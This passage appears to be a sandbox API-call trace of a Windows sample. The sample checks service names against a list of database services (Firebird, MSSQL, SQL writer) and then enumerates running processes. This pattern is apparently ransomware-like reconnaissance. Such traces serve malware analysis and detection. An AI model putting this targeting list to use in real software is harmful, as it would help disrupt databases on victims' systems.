[0301.685] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0301.685] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0301.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0301.685] lstrlenW (lpString="KeyIso") returned 6 [0301.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0301.685] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0301.685] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0301.685] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0301.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0301.685] lstrlenW (lpString="LanmanServer") returned 12 [0301.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0301.685] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0301.685] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0301.685] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0301.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0301.685] lstrlenW (lpString="LanmanWorkstation") returned 17 [0301.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0301.685] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0301.685] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0301.685] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0301.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0301.685] lstrlenW (lpString="lfsvc") returned 5 [0301.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0301.685] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0301.685] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0301.685] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0301.685] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0301.685] lstrlenW (lpString="lmhosts") returned 7 [0301.685] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0301.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0301.686] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0301.686] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0301.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0301.686] lstrlenW (lpString="LSM") returned 3 [0301.686] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0301.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0301.686] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0301.686] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0301.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0301.686] lstrlenW (lpString="MpsSvc") returned 6 [0301.686] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0301.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0301.686] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0301.686] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0301.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0301.686] lstrlenW (lpString="NcbService") returned 10 [0301.686] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0301.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0301.686] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0301.686] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0301.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0301.686] lstrlenW (lpString="netprofm") returned 8 [0301.686] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0301.686] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0301.686] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0301.686] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0301.686] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0301.686] lstrlenW (lpString="NgcSvc") returned 6 [0301.687] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0301.687] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0301.687] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0301.687] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0301.687] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0301.687] lstrlenW (lpString="NlaSvc") returned 6 [0301.687] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0301.687] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0301.687] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0301.687] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0301.687] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0301.687] lstrlenW (lpString="nsi") returned 3 [0301.687] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0301.687] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0301.687] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0301.687] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0301.687] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0301.687] lstrlenW (lpString="PcaSvc") returned 6 [0301.687] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0301.687] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0301.687] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0301.687] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0301.687] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0301.687] lstrlenW (lpString="PlugPlay") returned 8 [0301.687] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0301.687] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0301.687] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0301.688] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0301.688] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0301.688] lstrlenW (lpString="Power") returned 5 [0301.688] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0301.688] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0301.688] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0301.688] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0301.688] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0301.688] lstrlenW (lpString="ProfSvc") returned 7 [0301.688] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0301.688] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0301.688] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0301.688] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0301.688] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0301.688] lstrlenW (lpString="RpcEptMapper") returned 12 [0301.688] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0301.688] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0301.688] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0301.688] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0301.688] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0301.688] lstrlenW (lpString="RpcSs") returned 5 [0301.688] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0301.688] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0301.688] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0301.688] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0301.688] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0301.688] lstrlenW (lpString="SamSs") returned 5 [0301.688] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0301.688] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0301.688] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0301.688] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0301.688] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0301.688] lstrlenW (lpString="Schedule") returned 8 [0301.689] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0301.689] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0301.689] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0301.689] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0301.689] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0301.689] lstrlenW (lpString="SecurityHealthService") returned 21 [0301.689] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0301.689] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0301.689] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0301.689] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0301.689] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0301.689] lstrlenW (lpString="SENS") returned 4 [0301.689] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0301.689] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0301.689] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0301.689] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0301.689] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0301.689] lstrlenW (lpString="ShellHWDetection") returned 16 [0301.689] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0301.689] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0301.689] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0301.689] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0301.689] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0301.689] lstrlenW (lpString="Spooler") returned 7 [0301.689] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0301.689] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0301.689] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0301.689] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0301.689] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0301.689] lstrlenW (lpString="StateRepository") returned 15 [0301.689] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0301.690] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0301.690] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0301.690] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0301.690] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0301.690] lstrlenW (lpString="SysMain") returned 7 [0301.690] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0301.690] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0301.690] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0301.690] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0301.690] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0301.690] lstrlenW (lpString="SystemEventsBroker") returned 18 [0301.690] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0301.690] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0301.690] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0301.690] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0301.690] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0301.690] lstrlenW (lpString="Themes") returned 6 [0301.690] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0301.690] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0301.690] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0301.690] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0301.690] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0301.690] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0301.690] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0301.690] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0301.690] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0301.690] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0301.691] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="tiledatamodelsvc") returned -1 [0301.691] lstrlenW (lpString="TimeBrokerSvc") returned 13 [0301.691] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0301.691] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TimeBrokerSvc") returned -1 [0301.691] lstrcmpiW (lpString1="sqlwriter", lpString2="TimeBrokerSvc") returned -1 [0301.691] lstrcmpiW (lpString1="mssqlserver", lpString2="TimeBrokerSvc") returned -1 [0301.691] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x415db18 | out: hHeap=0x470000) returned 1 [0301.691] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4ec [0303.569] Process32FirstW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0303.570] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0303.571] lstrlenW (lpString="System") returned 6 [0303.571] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0303.572] lstrlenW (lpString="smss.exe") returned 8 [0303.572] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0303.572] lstrlenW (lpString="csrss.exe") returned 9 [0303.573] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0303.573] lstrlenW (lpString="wininit.exe") returned 11 [0303.573] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0303.574] lstrlenW (lpString="csrss.exe") returned 9 [0303.574] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0303.575] lstrlenW (lpString="winlogon.exe") returned 12 [0303.575] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0303.576] lstrlenW (lpString="services.exe") returned 12 [0303.576] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0303.577] lstrlenW (lpString="lsass.exe") returned 9 [0303.577] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0303.623] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0303.629] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0303.672] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0303.672] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.676] lstrlenW (lpString="svchost.exe") returned 11 [0303.676] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.677] lstrlenW (lpString="svchost.exe") returned 11 [0303.677] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0303.677] lstrlenW (lpString="dwm.exe") returned 7 [0303.677] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.678] lstrlenW (lpString="svchost.exe") returned 11 [0303.678] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.679] lstrlenW (lpString="svchost.exe") returned 11 [0303.679] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.680] lstrlenW (lpString="svchost.exe") returned 11 [0303.680] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.681] lstrlenW (lpString="svchost.exe") returned 11 [0303.681] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.681] lstrlenW (lpString="svchost.exe") returned 11 [0303.681] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.682] lstrlenW (lpString="svchost.exe") returned 11 [0303.682] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.682] lstrlenW (lpString="svchost.exe") returned 11 [0303.682] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.683] lstrlenW (lpString="svchost.exe") returned 11 [0303.683] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.684] lstrlenW (lpString="svchost.exe") returned 11 [0303.684] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.825] lstrlenW (lpString="svchost.exe") returned 11 [0303.825] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0303.826] lstrlenW (lpString="spoolsv.exe") returned 11 [0303.826] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.827] lstrlenW (lpString="svchost.exe") returned 11 [0303.827] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0303.827] lstrlenW (lpString="audiodg.exe") returned 11 [0303.827] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0303.828] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0303.828] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0303.828] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0303.828] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0303.829] lstrlenW (lpString="Memory Compression") returned 18 [0303.829] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0303.831] lstrlenW (lpString="sihost.exe") returned 10 [0303.831] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0303.832] lstrlenW (lpString="svchost.exe") returned 11 [0303.832] Process32NextW (in: hSnapshot=0x4ec, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, 